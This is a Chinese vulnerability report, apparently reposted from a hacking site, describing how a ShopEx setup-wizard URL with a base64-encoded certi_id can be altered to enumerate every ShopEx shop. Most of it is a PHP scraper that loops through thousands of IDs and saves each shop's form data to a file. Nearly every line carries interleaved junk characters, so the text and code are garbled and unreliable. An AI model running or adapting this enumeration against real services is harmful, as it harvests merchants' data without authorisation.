|
|
简要描述:
- g7 h/ x) F' A$ v7 v2 uShopEx某接口缺陷,可遍历所有网站6 l8 t5 I6 y% X. J
详细说明:+ k4 a5 j/ k& g$ \1 @5 S
问题出现在shopex 网店使用向导页面
# d' c( f# D$ U9 [
v! z+ h( n% G% j @: l! u- u( W3 U! w
+ h0 i2 e$ i- A" [* \
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
7 ~: X- d5 j# {' w/ b
% @* c2 A3 Q3 F, A, h( E
- j* S& @$ R, t g4 g! B: W+ y3 r/ Q) {
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}7 F* G) a9 O4 P$ V ~! T
$ ^8 Y5 c! v% b1 x5 m! K1 B& x- a' s$ z
2 o2 p$ t: ?, i$ W9 V2 |" A
: |4 Z& M$ @7 R: z我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 : F3 w, _7 m+ r- w. ?- K
w) E. M2 R/ U1 }
6 O6 I# F; V% G' a2 ^# u1 D& J' k0 a
<?php. w/ G' V6 I+ ]: P1 X: R
$ M4 n+ G& a9 n: b( Z3 f( }
for ($i=1; $i < 10000; $i++) { //遍历9 P* @% ^6 W9 y. [+ ~9 ?
9 Y6 _9 ]2 G. Y; Q' S" Z
ShowshopExD($i);' _( Z S) G' X, e) x2 h& Z
" S& L% u, `' X1 c" ]% o }3 o! E2 X' R' q3 D+ Y
0 t% _8 G! j% H) @# @ function ShowshopExD($cid) {
j/ ~! R5 @* b7 w0 V. U
1 W: Q# W+ {! X9 | $url='http://guide.ecos.shopex.cn/step2.php';: ?, B0 B( t& {5 v
& ]( t0 l" u: m$ r. S7 g- ~) e) B
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
7 `, X9 |0 b5 {! L$ b- S0 D7 k5 y" s( A9 \$ | [ S i5 _( I
$url = $url.'?refer='.$refer;
$ f! e+ A* u4 D' O2 D- z M# l
1 K5 d! Z% e, z' } $ch = curl_init($url);
) a" I% M+ s1 ^5 A) U' P% n% W3 \7 |) P* D- |2 c! L
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
: g4 w5 r- x+ {
" y2 q, Z9 ~5 R curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
! v+ B) Q$ E% }) ~7 x
1 B) c9 \. K& X+ [1 O $result = curl_exec($ch);
3 O) p5 ~ Z3 T+ i" R
: P3 j' |9 j' a7 Y $result = mb_convert_encoding($result, "gb2312", "UTF-8");
* E. ~* @+ W* `* Y" D( P, M
y: X, x7 T: Y: K if(strpos($result,$refer))
6 _, u [" }, [! `, ~: z m2 h* o; P" Z4 a8 [( }9 _, A5 j
{
0 q1 n# f2 R5 _8 N6 X6 B
4 U; x( R: ], z* U$ Z8 n $fp = fopen("c:/shopEx.txt",'ab'); //保存文件& L3 ~6 T$ Y' ?9 I6 y
5 v; c9 f {. g+ c; }* X preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);* e1 K% n1 Z! F0 p2 ~# H
5 i( q4 v; U4 |
foreach ($value[1] as $key) {' m2 E0 t; ?) w1 `" d* S
0 R- f @* S, [0 E f preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
% R1 x6 m1 ~; P" X3 j
( G, X( O! q0 u6 z- R8 _+ F0 d- _ echo $res[1][0].':'.$res[3][0]."\r\n";
' L4 p1 w3 k$ Y Q# D& _: D; I! l) @7 D- ?
$col =$res[1][0].':'.$res[3][0]."\r\n"; # T9 M2 P- E. U; u1 x9 K
* C$ i0 M0 o- u4 C! ]. t6 F, d2 C9 {$ T fwrite($fp, $col, strlen($col)); - O4 h% \% e1 ]$ T) a( ^
3 m6 k# E. K+ I) t
}9 D7 u- u3 o) ~& K* q
9 ~; Q$ U6 a, g
echo '--------------------------------'."\r\n";& u! d$ h! @7 C1 @/ v7 h% z4 k
2 ?) l0 w, @7 y& z! I fclose($fp);
& [" y. q# J( [' @; T' I
) F5 ~8 i/ S/ f }
' S8 t+ o- Y" M4 w4 q& C# Q1 _# u, R) n8 C! k( }& i
flush();
; j, `! K) z1 Q, s+ y$ v3 P* t$ {7 u% W" f; o
curl_close($ch);
- B/ Y( u" g* U1 r& B6 s+ v5 f- F5 b0 c* }
}
8 ?7 B+ x" w. e- q# ?$ z9 i+ q$ _( g4 w/ M8 V
?>) u0 {; P% n: ?3 L+ W9 }
漏洞证明:
+ s9 _; H1 U2 Vhttp://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
. P$ ]6 E4 @0 x/ Z8 F6 d& j j5 b( j% jrefer换成其他加密方式
; ?! y9 T$ V5 s |
|